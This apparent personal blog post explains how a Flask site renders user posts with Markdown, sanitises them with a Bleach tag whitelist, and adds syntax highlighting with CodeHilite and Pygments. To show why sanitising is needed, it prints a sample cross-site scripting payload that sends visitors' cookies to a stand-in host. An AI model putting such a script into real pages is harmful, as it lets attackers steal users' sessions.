Back to Blog Posts

Creating posts with Markdown, Bleach, CodeHilite and Pygments

Blog

Saturday, 01 February 2020

Rendering Text

These posts are mainly written in Markdown - a markup language that provides a method of formatting text using a simple syntax which easily converts to HTML, this makes it ideal to use when displaying text on a webpage.

This approach doesn't restrict posts to only being written in Markdown as HTML can also be used, they both have their benefits and shortcomings but the ability to use both can cover almost all bases. For example, both methods shown below produce the same output which is displayed underneath each code block.


###*Cool Heading*
* point 1
* point 2

Cool | Table | Columns
--- | --- | ---
a | b | c
1 | 2 | 3

Cool Heading

  • point 1
  • point 2

Cool | Table | Columns --- | --- | --- a | b | c 1 | 2 | 3


<h3><i>Cool Heading</i></h3>
<ul>
   <li>point 1</li>
   <li>point 2</li>
</ul>
<table class="table table-striped table-bordered">
   <thead>
      <tr>
         <th>Cool</th>
         <th>Table</th>
         <th>Columns</th>
      </tr>
   </thead>
   <tbody>
      <tr>
         <td>a</td>
         <td>b</td>
         <td>c</td>
      </tr>
      <tr>
         <td>1</td>
         <td>2</td>
         <td>3</td>
      </tr>
   </tbody>
</table>

Cool Heading

  • point 1
  • point 2
Cool Table Columns
a b c
1 2 3

Even in the small comparison below it shows that Markdown is slicker and easier to read than HTML and this is especially true in larger chunks of text, hence the appeal. Markdown can be used in this way to easily create tables, lists, codeblocks and other useful snippets that can be found in this cheatsheet.

While the HTML example is chunkier only to achieve the same thing, the one difference is the added class to the table which has allowed for a much better presentation. This kind of flexibility is not available when using Markdown and can go a long way in terms of control over the appearance. Having both options available is a great way to go.


Sanitising Text

Presenting users with the ability to create posts with HTML tags offers them a little too much freedom. They could easily take advantage and use tags that aren't just for styling text and instead take a malicious approach to inject their own code; to steal other users cookies for example whenever they visit the post.


<script type="text/javascript"> 
document.write("<iframe src='http://totallysafeplace.com/storethis?cookie="+document.cookie+"'></iframe>");
</script>

So the goal is to restrict the tags that can be used while keeping at least some creative outlook for the writer. Enter Bleach, a sanitising library that can strip or escape unwanted HTML from text before it gets stored. In this case a whitelist of tags, styles and attributes has been created that will allow for most common text formatting approaches. Any tags used that are not in the whitelist will be escaped and just appear as plain text.


allowed_tags = [
    "h1", "h2", "h3", "h4", "h5", "h6", "em", "strong"
]

sanitised_text = bleach.clean(lots_of_html, tags=allowed_tags)

One consideration about the content of this site is that code should be allowed to be present in code blocks (such as the script example above) but not in the rest of the post text. The text within a code block will be converted to HTML encoded characters meaning it won't appear as a blacklisted tag when the post is sanitised as it's just text:


<script>x</script>

becomes:


<div class="codehilite" style="background: #f0f0f0">
   <pre style="line-height: 125%">
    <span></span>
    <span style="color: #062873; font-weight: bold">
      &lt;script&gt;
    </span>
    x
    <span style="color: #062873; font-weight: bold">
      &lt;/script&gt;
    </span>
  </pre>
</div>


Highlighting Text

The markdown module includes an extension called CodeHilite, which when combined with Pygments can be used to add syntax highlighting to the code blocks. Once imported, the desired style can be configured using CodeHiliteExtension options. In this case, line numbers have been removed and noclasses has been used to specify that code blocks are to be highlighted using inline CSS generated by Pygments rather than using existing stylesheet.


code_css_class = "friendly"
hilite = CodeHiliteExtension(linenums=False, noclasses=True, pygments_style=code_css_class)
highlighted_text = markdown(some_sanistised_text, extensions=[hilite])

The pygments_style refers to a defined set of rules for the syntax highlighting. There are several builtin styles that are provided with Pygments which can be previewed on their demo page or a custom one can be written using Pygments Style subclass.

There is also a great variety of lexers supported, this is how the highlighting can remain consistent across different languages. The lexer can be defined at the top of each code block using a shebang or alternatively - Pygments is capable of guessing a lexer based based on patterns in the text.


All Together

After importing the modules needed, the user written content, self, gets passed to html_content. The highlighting options are set similarly to above with the addition of ExtraExtension to allow the creation of tables using Markdown.

Then the content gets wrapped in Markup which classes it as safe HTML, this avoids it being automatically escaped before it gets sanitised further down - see the Flask Markup documentation for an example. This Markup text now needs to be parsed through Markdown to convert text using Markdown syntax to HTML. This is also where the highlighting is generated and the extensions are used to convert Markdown tables to HTML tables.

The content is now all HTML with inline CSS on each line inside code blocks and the next step is to escape any tags, attributes or styles that are not specified in the whitelist. This uses the lists and dictionaries created earlier. The offending text could be completely removed by setting strip to True however this would lead to missing lines in code blocks.

Finally, the santisised HTML gets specified as safe again using Markup so it can be stored rendered in the page as HTML.


from flask import Markup
from markdown import markdown
from markdown.extensions.extra import ExtraExtension
from markdown.extensions.codehilite import CodeHiliteExtension


def html_content(self):

    code_css_class = "friendly"
    hilite = CodeHiliteExtension(linenums=False, noclasses=True, pygments_style=code_css_class)
    extras = ExtraExtension()

    pre_sanistised = Markup(self.content)
    markdown_content = markdown(pre_sanistised, extensions=[hilite, extras])
    post_sanitised = bleach.clean(markdown_content, tags=markdown_tags, attributes=markdown_attributes, styles=markdown_styles, strip=False)

    post_markup = Markup(post_sanitised)
    return post_markup


Leave a Comment

Comments (0)